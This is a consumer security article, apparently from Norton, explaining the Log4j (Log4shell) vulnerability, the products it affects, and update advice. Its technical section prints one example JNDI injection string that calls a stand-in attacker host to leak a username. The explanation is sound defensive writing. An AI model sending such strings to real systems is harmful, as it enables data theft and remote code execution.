Log4j: A more technical look at the bug
A new software vulnerability exists on many of the platforms and services you use in everyday life. The software bug, called Log4J, has gotten a lot of media attention recently, and it’s easy to understand why. It potentially exists in everything from Android phones to the Minecraft gaming platform.
The question on the minds of many consumers: What should I do?
Norton’s best advice is to update your systems and applications. Make sure you’re running the latest versions. That way, you can be sure your programs have the latest patches that fix software bugs.
Here’s what you need to know about the Log4j software vulnerability, how it could affect you, and what’s being done.
The new software vulnerability affects a component that is prevalent, but not well known by average users: Log4j. This vulnerability — or bug — has received the nickname Log4shell.
Apache Log4j is an open-source software library that is used by many Java programs to process and log events, such as errors. Most people have probably heard of Java. This cross-platform software is used in numerous applications used by ordinary people and companies alike. According to Oracle, the stewards of Java technology, more than 13 billion devices run Java (as of 2015).
Do you play Minecraft? You are using Java. Do you own an Android phone? You are using Java. Do you have a smart TV? Chances are it is running Java. Google, LinkedIn, and Amazon use Java. Java is everywhere. And that means this software flaw is almost everywhere as well.
What products are vulnerable?
The vulnerable versions of Apache Log4j are version 2.0 to 2.15. New patched versions have been released, but it will take considerable time before these have been updated everywhere Log4j is used. Because this vulnerability is still being researched, additional patched versions are likely.
The list of vulnerable and potentially vulnerable products that use Log4j is long. An overview is maintained by CISA, but many of the largest software vendors and products available have been mentioned as vulnerable to some extent. These include Microsoft, IBM, Amazon, Apache, Akamai, Atlassian, Broadcom, Cisco — and the list goes on.
What can you do as a home user?
Other than keeping your devices updated as well as possible, there is not a lot one can do. If you run a Java-enabled server of any kind — for example, a Minecraft server — you should make sure that all the latest patches are applied.
What are the broader risks of the flaw?
Cybercriminals can potentially use the flaw to break into various internet services and steal user data. That information could then be used for further malicious activity like identity theft.
Are internet-connected devices at risk?
It’s possible that internet-enabled consumer electronics could be at risk. Smart TVs, DVRs, security cameras — if they run a Java-enabled Apache webserver — might be vulnerable and could be taken over by criminals.
Do Norton products protect against this flaw?
Although this security flaw will not impact consumers as much as enterprises, Norton products will detect instances of the flaw being exploited and malware planted. More on this in the section below.
Log4j: A more technical look at the bug
Here’s a more technical look at the vulnerability, including how the software bug at a company level could have an impact on everyday consumers.
What does the bug do?
The log4j logging library processes text of various kinds, such as for example text in a chatroom, web server logs, and so on. Normally this is mundane and uneventful. However, when it comes across a sentence of a certain format it goes astray. One thing Log4j does is expand variables. It thinks a statement on the form “${something}” means that something is a variable, and it should replace it with another value; for example, the current date.
However, something can be a specially crafted URL, and that can cause Log4j to try to fetch the value to fill in from a remote site. This leaks information: ${jndi:ldap://evilhackers.tld/$env:USERNAME}}. If the URL points to a Java class file — i.e., Java program code — the code is fetched, inserted into memory and run with no checks as to whether the code is legitimate or not. This is known as Remote Code Execution (RCE) and is a very serious security flaw.
Log4j is used by many backend tools that underpin some of the most important Internet infrastructure we have today, so an exploit might not happen immediately, but could travel down the application stack until a backend application no one has been thinking about for years suddenly wants to fetch and run malicious code. Additionally, log4shell can be used to break into various internet services and steal customer data which then could be used for further malicious activity such as identity theft. Ransomware attacks could affect people’s workplaces.
Attacks can also be automated, and scanning for this bug has already been ongoing for a while and has been used to install malware like coin miners and ransomware. Although servers are the primary concern, client programs are also vulnerable making this a potential problem for home users. Consumers running vulnerable programs such as Minecraft (which is now patched) could be attacked by connecting to a malicious server (which Microsoft observed). Compromising consumer systems can lead to the theft of login credentials, financial information, and to install malware such as cryptominers.
Internet-enabled consumer electronics might also be at risk. Smart TV’s, DVR’s, security cameras — if they run a Java enabled Apache webserver, they might be vulnerable and could be taken over by cybercriminals.
